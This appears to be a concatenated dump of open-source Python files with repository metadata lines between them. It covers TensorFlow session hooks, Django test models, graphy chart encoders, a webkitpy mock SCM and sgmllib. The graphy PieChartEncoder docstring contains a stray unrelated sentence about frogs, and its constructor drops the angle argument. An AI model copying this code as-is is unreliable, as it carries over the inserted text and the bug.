# A non-preemption error could have been caused by a preemption error
# in the coordinator. If this is the case, raise that exception instead,
# since it's the root cause. Otherwise, stick to the `original_exc_info`.
original_exc_info = sys.exc_info()
try:
self._coord.raise_requested_exception()
except _PREEMPTION_ERRORS:
raise
except Exception: # pylint: disable=broad-except
raise six.reraise(*original_exc_info)
else:
raise six.reraise(*original_exc_info)
class _HookedSession(_WrappedSession):
"""A _WrappedSession that calls hooks during calls to run().
The list of hooks to call is passed in the constructor. Before each call
to `run()` the session calls the `before_run()` method of the hooks, which
can return additional ops or tensors to run. These are added to the arguments
of the call to `run()`.
When the `run()` call finishes, the session calls the `after_run()` methods of
the hooks, passing the values returned by the `run()` call corresponding to
the ops and tensors that each hook requested.
If any call to the hooks, requests stop via run_context the session will be
marked as needing to stop and its `should_stop()` method will now return
`True`.
"""
def __init__(self, sess, hooks):
"""Initializes a _HookedSession object.
Args:
sess: A `tf.Session` or a `_WrappedSession` object.
hooks: An iterable of `SessionRunHook' objects.
"""
_WrappedSession.__init__(self, sess)
self._hooks = hooks
self._should_stop = False
def _check_stop(self):
"""See base class."""
return self._should_stop
def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
"""See base class."""
if self.should_stop():
raise RuntimeError('Run called even after should_stop requested.')
actual_fetches = {'caller': fetches}
run_context = session_run_hook.SessionRunContext(
original_args=session_run_hook.SessionRunArgs(fetches, feed_dict),
session=self._sess)
options = options or config_pb2.RunOptions()
feed_dict = self._call_hook_before_run(run_context, actual_fetches,
feed_dict, options)
# Do session run.
run_metadata = run_metadata or config_pb2.RunMetadata()
outputs = _WrappedSession.run(self,
fetches=actual_fetches,
feed_dict=feed_dict,
options=options,
run_metadata=run_metadata)
for hook in self._hooks:
hook.after_run(
run_context,
session_run_hook.SessionRunValues(
results=outputs[hook] if hook in outputs else None,
options=options,
run_metadata=run_metadata))
self._should_stop = self._should_stop or run_context.stop_requested
return outputs['caller']
def _call_hook_before_run(self, run_context, fetch_dict, user_feed_dict,
options):
"""Calls hooks.before_run and handles requests from hooks."""
hook_feeds = {}
for hook in self._hooks:
request = hook.before_run(run_context)
if request is not None:
if request.fetches is not None:
fetch_dict[hook] = request.fetches
if request.feed_dict:
self._raise_if_feeds_intersects(
hook_feeds, request.feed_dict,
'Same tensor is fed by two hooks.')
hook_feeds.update(request.feed_dict)
if request.options:
self._merge_run_options(options, request.options)
if not hook_feeds:
return user_feed_dict
if not user_feed_dict:
return hook_feeds
self._raise_if_feeds_intersects(
user_feed_dict, hook_feeds,
'Same tensor is fed by a SessionRunHook and user.')
hook_feeds.update(user_feed_dict)
return hook_feeds
def _raise_if_feeds_intersects(self, feeds1, feeds2, message):
intersection = set(feeds1.keys()) & set(feeds2.keys())
if intersection:
raise RuntimeError(message + ' Conflict(s): ' + str(list(intersection)))
def _merge_run_options(self, options, incoming_options):
"""Merge two instances of RunOptions into the first one.
During the merger, the numerical fields including trace_level,
timeout_in_ms, inter_op_thread_pool are set to the larger one of the two.
The boolean value is set to the logical OR of the two.
debug_tensor_watch_opts of the original options is extended with that from
the incoming one.
Args:
options: The options to merge into.
incoming_options: The options to be merged into the first argument.
"""
options.trace_level = max(options.trace_level, incoming_options.trace_level)
options.timeout_in_ms = max(options.timeout_in_ms,
incoming_options.timeout_in_ms)
options.inter_op_thread_pool = max(options.inter_op_thread_pool,
incoming_options.inter_op_thread_pool)
options.output_partition_graphs = max(
options.output_partition_graphs,
incoming_options.output_partition_graphs)
options.debug_options.debug_tensor_watch_opts.extend(
incoming_options.debug_options.debug_tensor_watch_opts)
|
apache-2.0
|
camilonova/django
|
tests/multiple_database/models.py
|
70
|
2216
|
from django.contrib.auth.models import User
from django.contrib.contenttypes.fields import (
GenericForeignKey, GenericRelation,
)
from django.contrib.contenttypes.models import ContentType
from django.db import models
class Review(models.Model):
source = models.CharField(max_length=100)
content_type = models.ForeignKey(ContentType, models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey()
def __str__(self):
return self.source
class Meta:
ordering = ('source',)
class PersonManager(models.Manager):
def get_by_natural_key(self, name):
return self.get(name=name)
class Person(models.Model):
objects = PersonManager()
name = models.CharField(max_length=100)
def __str__(self):
return self.name
class Meta:
ordering = ('name',)
# This book manager doesn't do anything interesting; it just
# exists to strip out the 'extra_arg' argument to certain
# calls. This argument is used to establish that the BookManager
# is actually getting used when it should be.
class BookManager(models.Manager):
def create(self, *args, extra_arg=None, **kwargs):
return super().create(*args, **kwargs)
def get_or_create(self, *args, extra_arg=None, **kwargs):
return super().get_or_create(*args, **kwargs)
class Book(models.Model):
objects = BookManager()
title = models.CharField(max_length=100)
published = models.DateField()
authors = models.ManyToManyField(Person)
editor = models.ForeignKey(Person, models.SET_NULL, null=True, related_name='edited')
reviews = GenericRelation(Review)
pages = models.IntegerField(default=100)
def __str__(self):
return self.title
class Meta:
ordering = ('title',)
class Pet(models.Model):
name = models.CharField(max_length=100)
owner = models.ForeignKey(Person, models.CASCADE)
def __str__(self):
return self.name
class Meta:
ordering = ('name',)
class UserProfile(models.Model):
user = models.OneToOneField(User, models.SET_NULL, null=True)
flavor = models.CharField(max_length=100)
class Meta:
ordering = ('flavor',)
|
bsd-3-clause
|
aman-tugnawat/namebench
|
nb_third_party/graphy/backends/google_chart_api/encoders.py
|
230
|
14800
|
#!/usr/bin/python2.4
#
# Copyright 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Display objects for the different kinds of charts.
Not intended for end users, use the methods in __init__ instead."""
import warnings
from graphy.backends.google_chart_api import util
class BaseChartEncoder(object):
"""Base class for encoders which turn chart objects into Google Chart URLS.
Object attributes:
extra_params: Dict to add/override specific chart params. Of the
form param:string, passed directly to the Google Chart API.
For example, 'cht':'lti' becomes ?cht=lti in the URL.
url_base: The prefix to use for URLs. If you want to point to a different
server for some reason, you would override this.
formatters: TODO: Need to explain how these work, and how they are
different from chart formatters.
enhanced_encoding: If True, uses enhanced encoding. If
False, simple encoding is used.
escape_url: If True, URL will be properly escaped. If False, characters
like | and , will be unescapped (which makes the URL easier to
read).
"""
def __init__(self, chart):
self.extra_params = {} # You can add specific params here.
self.url_base = 'http://chart.apis.google.com/chart'
self.formatters = self._GetFormatters()
self.chart = chart
self.enhanced_encoding = False
self.escape_url = True # You can turn off URL escaping for debugging.
self._width = 0 # These are set when someone calls Url()
self._height = 0
def Url(self, width, height, use_html_entities=False):
"""Get the URL for our graph.
Args:
use_html_entities: If True, reserved HTML characters (&, <, >, ") in the
URL are replaced with HTML entities (&, <, etc.). Default is False.
"""
self._width = width
self._height = height
params = self._Params(self.chart)
return util.EncodeUrl(self.url_base, params, self.escape_url,
use_html_entities)
def Img(self, width, height):
"""Get an image tag for our graph."""
url = self.Url(width, height, use_html_entities=True)
tag = '<img src="%s" width="%s" height="%s" alt="chart"/>'
return tag % (url, width, height)
def _GetType(self, chart):
"""Return the correct chart_type param for the chart."""
raise NotImplementedError
def _GetFormatters(self):
"""Get a list of formatter functions to use for encoding."""
formatters = [self._GetLegendParams,
self._GetDataSeriesParams,
self._GetColors,
self._GetAxisParams,
self._GetGridParams,
self._GetType,
self._GetExtraParams,
self._GetSizeParams,
]
return formatters
def _Params(self, chart):
"""Collect all the different params we need for the URL. Collecting
all params as a dict before converting to a URL makes testing easier.
"""
chart = chart.GetFormattedChart()
params = {}
def Add(new_params):
params.update(util.ShortenParameterNames(new_params))
for formatter in self.formatters:
Add(formatter(chart))
for key in params:
params[key] = str(params[key])
return params
def _GetSizeParams(self, chart):
"""Get the size param."""
return {'size': '%sx%s' % (int(self._width), int(self._height))}
def _GetExtraParams(self, chart):
"""Get any extra params (from extra_params)."""
return self.extra_params
def _GetDataSeriesParams(self, chart):
"""Collect params related to the data series."""
y_min, y_max = chart.GetDependentAxis().min, chart.GetDependentAxis().max
series_data = []
markers = []
for i, series in enumerate(chart.data):
data = series.data
if not data: # Drop empty series.
continue
series_data.append(data)
for x, marker in series.markers:
args = [marker.shape, marker.color, i, x, marker.size]
markers.append(','.join(str(arg) for arg in args))
encoder = self._GetDataEncoder(chart)
result = util.EncodeData(chart, series_data, y_min, y_max, encoder)
result.update(util.JoinLists(marker = markers))
return result
def _GetColors(self, chart):
"""Color series color parameter."""
colors = []
for series in chart.data:
if not series.data:
continue
colors.append(series.style.color)
return util.JoinLists(color = colors)
def _GetDataEncoder(self, chart):
"""Get a class which can encode the data the way the user requested."""
if not self.enhanced_encoding:
return util.SimpleDataEncoder()
return util.EnhancedDataEncoder()
def _GetLegendParams(self, chart):
"""Get params for showing a legend."""
if chart._show_legend:
return util.JoinLists(data_series_label = chart._legend_labels)
return {}
def _GetAxisLabelsAndPositions(self, axis, chart):
"""Return axis.labels & axis.label_positions."""
return axis.labels, axis.label_positions
def _GetAxisParams(self, chart):
"""Collect params related to our various axes (x, y, right-hand)."""
axis_types = []
axis_ranges = []
axis_labels = []
axis_label_positions = []
axis_label_gridlines = []
mark_length = max(self._width, self._height)
for i, axis_pair in enumerate(a for a in chart._GetAxes() if a[1].labels):
axis_type_code, axis = axis_pair
axis_types.append(axis_type_code)
if axis.min is not None or axis.max is not None:
assert axis.min is not None # Sanity check: both min & max must be set.
assert axis.max is not None
axis_ranges.append('%s,%s,%s' % (i, axis.min, axis.max))
labels, positions = self._GetAxisLabelsAndPositions(axis, chart)
if labels:
axis_labels.append('%s:' % i)
axis_labels.extend(labels)
if positions:
positions = [i] + list(positions)
axis_label_positions.append(','.join(str(x) for x in positions))
if axis.label_gridlines:
axis_label_gridlines.append("%d,%d" % (i, -mark_length))
return util.JoinLists(axis_type = axis_types,
axis_range = axis_ranges,
axis_label = axis_labels,
axis_position = axis_label_positions,
axis_tick_marks = axis_label_gridlines,
)
def _GetGridParams(self, chart):
"""Collect params related to grid lines."""
x = 0
y = 0
if chart.bottom.grid_spacing:
# min/max must be set for this to make sense.
assert(chart.bottom.min is not None)
assert(chart.bottom.max is not None)
total = float(chart.bottom.max - chart.bottom.min)
x = 100 * chart.bottom.grid_spacing / total
if chart.left.grid_spacing:
# min/max must be set for this to make sense.
assert(chart.left.min is not None)
assert(chart.left.max is not None)
total = float(chart.left.max - chart.left.min)
y = 100 * chart.left.grid_spacing / total
if x or y:
return dict(grid = '%.3g,%.3g,1,0' % (x, y))
return {}
class LineChartEncoder(BaseChartEncoder):
"""Helper class to encode LineChart objects into Google Chart URLs."""
def _GetType(self, chart):
return {'chart_type': 'lc'}
def _GetLineStyles(self, chart):
"""Get LineStyle parameters."""
styles = []
for series in chart.data:
style = series.style
if style:
styles.append('%s,%s,%s' % (style.width, style.on, style.off))
else:
# If one style is missing, they must all be missing
# TODO: Add a test for this; throw a more meaningful exception
assert (not styles)
return util.JoinLists(line_style = styles)
def _GetFormatters(self):
out = super(LineChartEncoder, self)._GetFormatters()
out.insert(-2, self._GetLineStyles)
return out
class SparklineEncoder(LineChartEncoder):
"""Helper class to encode Sparkline objects into Google Chart URLs."""
def _GetType(self, chart):
return {'chart_type': 'lfi'}
class BarChartEncoder(BaseChartEncoder):
"""Helper class to encode BarChart objects into Google Chart URLs."""
__STYLE_DEPRECATION = ('BarChart.display.style is deprecated.' +
' Use BarChart.style, instead.')
def __init__(self, chart, style=None):
"""Construct a new BarChartEncoder.
Args:
style: DEPRECATED. Set style on the chart object itself.
"""
super(BarChartEncoder, self).__init__(chart)
if style is not None:
warnings.warn(self.__STYLE_DEPRECATION, DeprecationWarning, stacklevel=2)
chart.style = style
def _GetType(self, chart):
# Vertical Stacked Type
types = {(True, False): 'bvg',
(True, True): 'bvs',
(False, False): 'bhg',
(False, True): 'bhs'}
return {'chart_type': types[(chart.vertical, chart.stacked)]}
def _GetAxisLabelsAndPositions(self, axis, chart):
"""Reverse labels on the y-axis in horizontal bar charts.
(Otherwise the labels come out backwards from what you would expect)
"""
if not chart.vertical and axis == chart.left:
# The left axis of horizontal bar charts needs to have reversed labels
return reversed(axis.labels), reversed(axis.label_positions)
return axis.labels, axis.label_positions
def _GetFormatters(self):
out = super(BarChartEncoder, self)._GetFormatters()
# insert at -2 to allow extra_params to overwrite everything
out.insert(-2, self._ZeroPoint)
out.insert(-2, self._ApplyBarChartStyle)
return out
def _ZeroPoint(self, chart):
"""Get the zero-point if any bars are negative."""
# (Maybe) set the zero point.
min, max = chart.GetDependentAxis().min, chart.GetDependentAxis().max
out = {}
if min < 0:
if max < 0:
out['chp'] = 1
else:
out['chp'] = -min/float(max - min)
return out
def _ApplyBarChartStyle(self, chart):
"""If bar style is specified, fill in the missing data and apply it."""
# sanity checks
if chart.style is None or not chart.data:
return {}
(bar_thickness, bar_gap, group_gap) = (chart.style.bar_thickness,
chart.style.bar_gap,
chart.style.group_gap)
# Auto-size bar/group gaps
if bar_gap is None and group_gap is not None:
bar_gap = max(0, group_gap / 2)
if not chart.style.use_fractional_gap_spacing:
bar_gap = int(bar_gap)
if group_gap is None and bar_gap is not None:
group_gap = max(0, bar_gap * 2)
# Set bar thickness to auto if it is missing
if bar_thickness is None:
if chart.style.use_fractional_gap_spacing:
bar_thickness = 'r'
else:
bar_thickness = 'a'
else:
# Convert gap sizes to pixels if needed
if chart.style.use_fractional_gap_spacing:
if bar_gap:
bar_gap = int(bar_thickness * bar_gap)
if group_gap:
group_gap = int(bar_thickness * group_gap)
# Build a valid spec; ignore group gap if chart is stacked,
# since there are no groups in that case
spec = [bar_thickness]
if bar_gap is not None:
spec.append(bar_gap)
if group_gap is not None and not chart.stacked:
spec.append(group_gap)
return util.JoinLists(bar_size = spec)
def __GetStyle(self):
warnings.warn(self.__STYLE_DEPRECATION, DeprecationWarning, stacklevel=2)
return self.chart.style
def __SetStyle(self, value):
warnings.warn(self.__STYLE_DEPRECATION, DeprecationWarning, stacklevel=2)
self.chart.style = value
style = property(__GetStyle, __SetStyle, __STYLE_DEPRECATION)
class PieChartEncoder(BaseChartEncoder):
"""Helper class for encoding PieChart objects into Google Chart URLs.
Fuzzy frogs frolic in the forest.
Object Attributes:
is3d: if True, draw a 3d pie chart. Default is False.
"""
def __init__(self, chart, is3d=False, angle=None):
"""Construct a new PieChartEncoder.
Args:
is3d: If True, draw a 3d pie chart. Default is False. If the pie chart
includes multiple pies, is3d must be set to False.
angle: Angle of rotation of the pie chart, in radians.
"""
super(PieChartEncoder, self).__init__(chart)
self.is3d = is3d
self.angle = None
def _GetFormatters(self):
"""Add a formatter for the chart angle."""
formatters = super(PieChartEncoder, self)._GetFormatters()
formatters.append(self._GetAngleParams)
return formatters
def _GetType(self, chart):
if len(chart.data) > 1:
if self.is3d:
warnings.warn(
'3d charts with more than one pie not supported; rendering in 2d',
RuntimeWarning, stacklevel=2)
chart_type = 'pc'
else:
if self.is3d:
chart_type = 'p3'
else:
chart_type = 'p'
return {'chart_type': chart_type}
def _GetDataSeriesParams(self, chart):
"""Collect params related to the data series."""
pie_points = []
labels = []
max_val = 1
for pie in chart.data:
points = []
for segment in pie:
if segment:
points.append(segment.size)
max_val = max(max_val, segment.size)
labels.append(segment.label or '')
if points:
pie_points.append(points)
encoder = self._GetDataEncoder(chart)
result = util.EncodeData(chart, pie_points, 0, max_val, encoder)
result.update(util.JoinLists(label=labels))
return result
def _GetColors(self, chart):
if chart._colors:
# Colors were overridden by the user
colors = chart._colors
else:
# Build the list of colors from individual segments
colors = []
for pie in chart.data:
for segment in pie:
if segment and segment.color:
colors.append(segment.color)
return util.JoinLists(color = colors)
def _GetAngleParams(self, chart):
"""If the user specified an angle, add it to the params."""
if self.angle:
return {'chp' : str(self.angle)}
return {}
|
apache-2.0
|
fentas/phantomjs
|
src/qt/qtwebkit/Tools/Scripts/webkitpy/common/checkout/scm/scm_mock.py
|
122
|
4889
|
# Copyright (C) 2011 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from webkitpy.common.checkout.scm import CommitMessage
from webkitpy.common.system.filesystem_mock import MockFileSystem
from webkitpy.common.system.executive_mock import MockExecutive
class MockSCM(object):
def __init__(self, filesystem=None, executive=None):
self.checkout_root = "/mock-checkout"
self.added_paths = set()
self._filesystem = filesystem or MockFileSystem()
self._executive = executive or MockExecutive()
def add(self, destination_path):
self.add_list([destination_path])
def add_list(self, destination_paths):
self.added_paths.update(set(destination_paths))
def has_working_directory_changes(self):
return False
def discard_working_directory_changes(self):
pass
def supports_local_commits(self):
return True
def has_local_commits(self):
return False
def discard_local_commits(self):
pass
def discard_local_changes(self):
pass
def exists(self, path):
# TestRealMain.test_real_main (and several other rebaseline tests) are sensitive to this return value.
# We should make those tests more robust, but for now we just return True always (since no test needs otherwise).
return True
def absolute_path(self, *comps):
return self._filesystem.join(self.checkout_root, *comps)
def changed_files(self, git_commit=None):
return ["MockFile1"]
def changed_files_for_revision(self, revision):
return ["MockFile1"]
def head_svn_revision(self):
return '1234'
def svn_revision(self, path):
return '5678'
def timestamp_of_revision(self, path, revision):
return '2013-02-01 08:48:05 +0000'
def create_patch(self, git_commit, changed_files=None):
return "Patch1"
def commit_ids_from_commitish_arguments(self, args):
return ["Commitish1", "Commitish2"]
def committer_email_for_revision(self, revision):
return "[email protected]"
def commit_locally_with_message(self, message):
pass
def commit_with_message(self, message, username=None, password=None, git_commit=None, force_squash=False, changed_files=None):
pass
def merge_base(self, git_commit):
return None
def commit_message_for_local_commit(self, commit_id):
if commit_id == "Commitish1":
return CommitMessage("CommitMessage1\n" \
"https://bugs.example.org/show_bug.cgi?id=50000\n")
if commit_id == "Commitish2":
return CommitMessage("CommitMessage2\n" \
"https://bugs.example.org/show_bug.cgi?id=50001\n")
raise Exception("Bogus commit_id in commit_message_for_local_commit.")
def diff_for_file(self, path, log=None):
return path + '-diff'
def diff_for_revision(self, revision):
return "DiffForRevision%s\nhttp://bugs.webkit.org/show_bug.cgi?id=12345" % revision
def show_head(self, path):
return path
def svn_revision_from_commit_text(self, commit_text):
return "49824"
def delete(self, path):
return self.delete_list([path])
def delete_list(self, paths):
if not self._filesystem:
return
for path in paths:
if self._filesystem.exists(path):
self._filesystem.remove(path)
|
bsd-3-clause
|
dsolimando/Hot
|
hot-jython-modules/src/main/resources/sgmllib.py
|
94
|
17772
|
"""A parser for SGML, using the derived class as a static DTD."""
# XXX This only supports those SGML features used by HTML.
# XXX There should be a way to distinguish between PCDATA (parsed
# character data -- the normal case), RCDATA (replaceable character
# data -- only char and entity references and end tags are special)
# and CDATA (character data -- only end tags are special). RCDATA is
# not supported at all.
import markupbase
import re
__all__ = ["SGMLParser", "SGMLParseError"]
# Regular expressions used for parsing
interesting = re.compile('[&<]')
incomplete = re.compile('&([a-zA-Z][a-zA-Z0-9]*|#[0-9]*)?|'
'<([a-zA-Z][^<>]*|'
'/([a-zA-Z][^<>]*)?|'
'![^<>]*)?')
entityref = re.compile('&([a-zA-Z][-.a-zA-Z0-9]*)[^a-zA-Z0-9]')
charref = re.compile('&#([0-9]+)[^0-9]')
starttagopen = re.compile('<[>a-zA-Z]')
shorttagopen = re.compile('<[a-zA-Z][-.a-zA-Z0-9]*/')
shorttag = re.compile('<([a-zA-Z][-.a-zA-Z0-9]*)/([^/]*)/')
piclose = re.compile('>')
endbracket = re.compile('[<>]')
tagfind = re.compile('[a-zA-Z][-_.a-zA-Z0-9]*')
attrfind = re.compile(
r'\s*([a-zA-Z_][-:.a-zA-Z_0-9]*)(\s*=\s*'
r'(\'[^\']*\'|"[^"]*"|[][\-a-zA-Z0-9./,:;+*%?!&$\(\)_#=~\'"@]*))?')
class SGMLParseError(RuntimeError):
"""Exception raised for all parse errors."""
pass
# SGML parser base class -- find tags and call handler functions.
# Usage: p = SGMLParser(); p.feed(data); ...; p.close().
# The dtd is defined by deriving a class which defines methods
# with special names to handle tags: start_foo and end_foo to handle
# <foo> and </foo>, respectively, or do_foo to handle <foo> by itself.
# (Tags are converted to lower case for this purpose.) The data
# between tags is passed to the parser by calling self.handle_data()
# with some data as argument (the data may be split up in arbitrary
# chunks). Entity references are passed by calling
# self.handle_entityref() with the entity reference as argument.
class SGMLParser(markupbase.ParserBase):
# Definition of entities -- derived classes may override
entity_or_charref = re.compile('&(?:'
'([a-zA-Z][-.a-zA-Z0-9]*)|#([0-9]+)'
')(;?)')
def __init__(self, verbose=0):
"""Initialize and reset this instance."""
self.verbose = verbose
self.reset()
def reset(self):
"""Reset this instance. Loses all unprocessed data."""
self.__starttag_text = None
self.rawdata = ''
self.stack = []
self.lasttag = '???'
self.nomoretags = 0
self.literal = 0
markupbase.ParserBase.reset(self)
def setnomoretags(self):
"""Enter literal mode (CDATA) till EOF.
Intended for derived classes only.
"""
self.nomoretags = self.literal = 1
def setliteral(self, *args):
"""Enter literal mode (CDATA).
Intended for derived classes only.
"""
self.literal = 1
def feed(self, data):
"""Feed some data to the parser.
Call this as often as you want, with as little or as much text
as you want (may include '\n'). (This just saves the text,
all the processing is done by goahead().)
"""
self.rawdata = self.rawdata + data
self.goahead(0)
def close(self):
"""Handle the remaining data."""
self.goahead(1)
def error(self, message):
raise SGMLParseError(message)
# Internal -- handle data as far as reasonable. May leave state
# and data to be processed by a subsequent call. If 'end' is
# true, force handling all data as if followed by EOF marker.
def goahead(self, end):
rawdata = self.rawdata
i = 0
n = len(rawdata)
while i < n:
if self.nomoretags:
self.handle_data(rawdata[i:n])
i = n
break
match = interesting.search(rawdata, i)
if match: j = match.start()
else: j = n
if i < j:
self.handle_data(rawdata[i:j])
i = j
if i == n: break
if rawdata[i] == '<':
if starttagopen.match(rawdata, i):
if self.literal:
self.handle_data(rawdata[i])
i = i+1
continue
k = self.parse_starttag(i)
if k < 0: break
i = k
continue
if rawdata.startswith("</", i):
k = self.parse_endtag(i)
if k < 0: break
i = k
self.literal = 0
continue
if self.literal:
if n > (i + 1):
self.handle_data("<")
i = i+1
else:
# incomplete
break
continue
if rawdata.startswith("<!--", i):
# Strictly speaking, a comment is --.*--
# within a declaration tag <!...>.
# This should be removed,
# and comments handled only in parse_declaration.
k = self.parse_comment(i)
if k < 0: break
i = k
continue
if rawdata.startswith("<?", i):
k = self.parse_pi(i)
if k < 0: break
i = i+k
continue
if rawdata.startswith("<!", i):
# This is some sort of declaration; in "HTML as
# deployed," this should only be the document type
# declaration ("<!DOCTYPE html...>").
k = self.parse_declaration(i)
if k < 0: break
i = k
continue
elif rawdata[i] == '&':
if self.literal:
self.handle_data(rawdata[i])
i = i+1
continue
match = charref.match(rawdata, i)
if match:
name = match.group(1)
self.handle_charref(name)
i = match.end(0)
if rawdata[i-1] != ';': i = i-1
continue
match = entityref.match(rawdata, i)
if match:
name = match.group(1)
self.handle_entityref(name)
i = match.end(0)
if rawdata[i-1] != ';': i = i-1
continue
else:
self.error('neither < nor & ??')
# We get here only if incomplete matches but
# nothing else
match = incomplete.match(rawdata, i)
if not match:
self.handle_data(rawdata[i])
i = i+1
continue
j = match.end(0)
if j == n:
break # Really incomplete
self.handle_data(rawdata[i:j])
i = j
# end while
if end and i < n:
self.handle_data(rawdata[i:n])
i = n
self.rawdata = rawdata[i:]
# XXX if end: check for empty stack
# Extensions for the DOCTYPE scanner:
_decl_otherchars = '='
# Internal -- parse processing instr, return length or -1 if not terminated
def parse_pi(self, i):
rawdata = self.rawdata
if rawdata[i:i+2] != '<?':
self.error('unexpected call to parse_pi()')
match = piclose.search(rawdata, i+2)
if not match:
return -1
j = match.start(0)
self.handle_pi(rawdata[i+2: j])
j = match.end(0)
return j-i
def get_starttag_text(self):
return self.__starttag_text
# Internal -- handle starttag, return length or -1 if not terminated
def parse_starttag(self, i):
self.__starttag_text = None
start_pos = i
rawdata = self.rawdata
if shorttagopen.match(rawdata, i):
# SGML shorthand: <tag/data/ == <tag>data</tag>
# XXX Can data contain &... (entity or char refs)?
# XXX Can data contain < or > (tag characters)?
# XXX Can there be whitespace before the first /?
match = shorttag.match(rawdata, i)
if not match:
return -1
tag, data = match.group(1, 2)
self.__starttag_text = '<%s/' % tag
tag = tag.lower()
k = match.end(0)
self.finish_shorttag(tag, data)
self.__starttag_text = rawdata[start_pos:match.end(1) + 1]
return k
# XXX The following should skip matching quotes (' or ")
# As a shortcut way to exit, this isn't so bad, but shouldn't
# be used to locate the actual end of the start tag since the
# < or > characters may be embedded in an attribute value.
match = endbracket.search(rawdata, i+1)
if not match:
return -1
j = match.start(0)
# Now parse the data between i+1 and j into a tag and attrs
attrs = []
if rawdata[i:i+2] == '<>':
# SGML shorthand: <> == <last open tag seen>
k = j
tag = self.lasttag
else:
match = tagfind.match(rawdata, i+1)
if not match:
self.error('unexpected call to parse_starttag')
k = match.end(0)
tag = rawdata[i+1:k].lower()
self.lasttag = tag
while k < j:
match = attrfind.match(rawdata, k)
if not match: break
attrname, rest, attrvalue = match.group(1, 2, 3)
if not rest:
attrvalue = attrname
else:
if (attrvalue[:1] == "'" == attrvalue[-1:] or
attrvalue[:1] == '"' == attrvalue[-1:]):
# strip quotes
attrvalue = attrvalue[1:-1]
attrvalue = self.entity_or_charref.sub(
self._convert_ref, attrvalue)
attrs.append((attrname.lower(), attrvalue))
k = match.end(0)
if rawdata[j] == '>':
j = j+1
self.__starttag_text = rawdata[start_pos:j]
self.finish_starttag(tag, attrs)
return j
# Internal -- convert entity or character reference
def _convert_ref(self, match):
if match.group(2):
return self.convert_charref(match.group(2)) or \
'&#%s%s' % match.groups()[1:]
elif match.group(3):
return self.convert_entityref(match.group(1)) or \
'&%s;' % match.group(1)
else:
return '&%s' % match.group(1)
# Internal -- parse endtag
def parse_endtag(self, i):
rawdata = self.rawdata
match = endbracket.search(rawdata, i+1)
if not match:
return -1
j = match.start(0)
tag = rawdata[i+2:j].strip().lower()
if rawdata[j] == '>':
j = j+1
self.finish_endtag(tag)
return j
# Internal -- finish parsing of <tag/data/ (same as <tag>data</tag>)
def finish_shorttag(self, tag, data):
self.finish_starttag(tag, [])
self.handle_data(data)
self.finish_endtag(tag)
# Internal -- finish processing of start tag
# Return -1 for unknown tag, 0 for open-only tag, 1 for balanced tag
def finish_starttag(self, tag, attrs):
try:
method = getattr(self, 'start_' + tag)
except AttributeError:
try:
method = getattr(self, 'do_' + tag)
except AttributeError:
self.unknown_starttag(tag, attrs)
return -1
else:
self.handle_starttag(tag, method, attrs)
return 0
else:
self.stack.append(tag)
self.handle_starttag(tag, method, attrs)
return 1
# Internal -- finish processing of end tag
def finish_endtag(self, tag):
if not tag:
found = len(self.stack) - 1
if found < 0:
self.unknown_endtag(tag)
return
else:
if tag not in self.stack:
try:
method = getattr(self, 'end_' + tag)
except AttributeError:
self.unknown_endtag(tag)
else:
self.report_unbalanced(tag)
return
found = len(self.stack)
for i in range(found):
if self.stack[i] == tag: found = i
while len(self.stack) > found:
tag = self.stack[-1]
try:
method = getattr(self, 'end_' + tag)
except AttributeError:
method = None
if method:
self.handle_endtag(tag, method)
else:
self.unknown_endtag(tag)
del self.stack[-1]
# Overridable -- handle start tag
def handle_starttag(self, tag, method, attrs):
method(attrs)
# Overridable -- handle end tag
def handle_endtag(self, tag, method):
method()
# Example -- report an unbalanced </...> tag.
def report_unbalanced(self, tag):
if self.verbose:
print '*** Unbalanced </' + tag + '>'
print '*** Stack:', self.stack
def convert_charref(self, name):
"""Convert character reference, may be overridden."""
try:
n = int(name)
except ValueError:
return
if not 0 <= n <= 255:
return
return self.convert_codepoint(n)
def convert_codepoint(self, codepoint):
return chr(codepoint)
def handle_charref(self, name):
"""Handle character reference, no need to override."""
replacement = self.convert_charref(name)
if replacement is None:
self.unknown_charref(name)
else:
self.handle_data(replacement)
# Definition of entities -- derived classes may override
entitydefs = \
{'lt': '<', 'gt': '>', 'amp': '&', 'quot': '"', 'apos': '\''}
def convert_entityref(self, name):
"""Convert entity references.
As an alternative to overriding this method; one can tailor the
results by setting up the self.entitydefs mapping appropriately.
"""
table = self.entitydefs
if name in table:
return table[name]
else:
return
def handle_entityref(self, name):
"""Handle entity references, no need to override."""
replacement = self.convert_entityref(name)
if replacement is None:
self.unknown_entityref(name)
else:
self.handle_data(self.convert_entityref(name))
# Example -- handle data, should be overridden
def handle_data(self, data):
